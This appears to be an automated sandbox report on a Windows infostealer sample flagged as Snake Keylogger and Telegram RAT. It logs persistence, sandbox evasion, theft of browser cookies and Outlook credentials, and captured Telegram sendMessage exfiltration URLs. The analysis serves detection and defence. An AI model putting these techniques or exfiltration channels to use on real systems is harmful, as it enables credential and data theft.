                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595736Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595596Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595463Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595341Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595164Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593860Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: wscript.exe, 00000002.00000002.1444787963.000001F4D61B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: InstallUtil.exe, 00000004.00000002.2566343154.0000000000687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll934e
                      Source: XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                      Source: InstallUtil.exe, 00000001.00000002.2567835645.0000000000EFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B8FE8 LdrInitializeThunk,1_2_064B8FE8
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\XsdType.exe "C:\Users\user\AppData\Roaming\XsdType.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeQueries volume information: C:\Users\user\Desktop\pbgjw8i8N7.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeQueries volume information: C:\Users\user\AppData\Roaming\XsdType.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Snake Keylogger
                      Source: Yara matchFile source: 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR
                      Yara detected VIP Keylogger
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.2570925272.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2569306283.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7500, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Snake Keylogger
                      Source: Yara matchFile source: 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR
                      Yara detected VIP Keylogger
                      Source: Yara matchFile source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.2570925272.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2569306283.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting                      		Valid Accounts2
                      Command and Scripting Interpreter                      		111
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		2
                      File and Directory Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		11
                      Process Injection                      		3
                      Obfuscated Files or Information                      		LSASS Memory13
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		12
                      Software Packing                      		Security Account Manager21
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron2
                      Registry Run Keys / Startup Folder                      		2
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Clipboard Data                      		3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading                      		LSA Secrets31
                      Virtualization/Sandbox Evasion                      		SSHKeylogging24
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Process Injection                      		DCSync1
                      System Network Configuration Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634876 Sample: pbgjw8i8N7.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 29 reallyfreegeoip.org 2->29 31 api.telegram.org 2->31 33 3 other IPs or domains 2->33 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 51 12 other signatures 2->51 8 pbgjw8i8N7.exe 5 2->8         started        12 wscript.exe 1 2->12         started        signatures3 47 Tries to detect the country of the analysis system (by using the IP) 29->47 49 Uses the Telegram API (likely for C&C communication) 31->49 process4 file5 23 C:\Users\user\AppData\Roaming\XsdType.exe, PE32 8->23 dropped 25 C:\Users\user\...\XsdType.exe:Zone.Identifier, ASCII 8->25 dropped 27 C:\Users\user\AppData\Roaming\...\XsdType.vbs, ASCII 8->27 dropped 57 Drops VBS files to the startup folder 8->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->59 14 InstallUtil.exe 15 2 8->14         started        61 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->61 18 XsdType.exe 2 12->18         started        signatures6 process7 dnsIp8 35 api.telegram.org 149.154.167.220, 443, 49745, 49753 TELEGRAMRU United Kingdom 14->35 37 checkip.dyndns.com 158.101.44.242, 49712, 49715, 49716 ORACLE-BMC-31898US United States 14->37 39 2 other IPs or domains 14->39 63 Tries to steal Mail credentials (via file / registry access) 14->63 65 Antivirus detection for dropped file 18->65 67 Multi AV Scanner detection for dropped file 18->67 20 InstallUtil.exe 2 18->20         started        signatures9 process10 signatures11 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      pbgjw8i8N7.exe70%VirustotalBrowse
                      pbgjw8i8N7.exe63%ReversingLabsByteCode-MSIL.Infostealer.Browsstl
                      pbgjw8i8N7.exe100%AviraTR/AD.GenSteal.frzkf

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\XsdType.exe100%AviraTR/AD.GenSteal.frzkf
                      C:\Users\user\AppData\Roaming\XsdType.exe70%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\XsdType.exe63%ReversingLabsByteCode-MSIL.Infostealer.Browsstl

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.iaa-airferight.com
                      		46.175.148.58
                      		truefalse
                        		high
                        reallyfreegeoip.org
                        		104.21.96.1
                        		truefalse
                          		high
                          api.telegram.org
                          		149.154.167.220
                          		truefalse
                            		high
                            checkip.dyndns.com
                            		158.101.44.242
                            		truefalse
                              		high
                              checkip.dyndns.org
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://reallyfreegeoip.org/xml/8.46.123.189false
                                  		high
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2023:06:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                    		high
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2012/03/2025%20/%2005:49:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                      		high
                                      http://checkip.dyndns.org/false
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.office.com/InstallUtil.exe, 00000004.00000002.2569306283.0000000002551000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
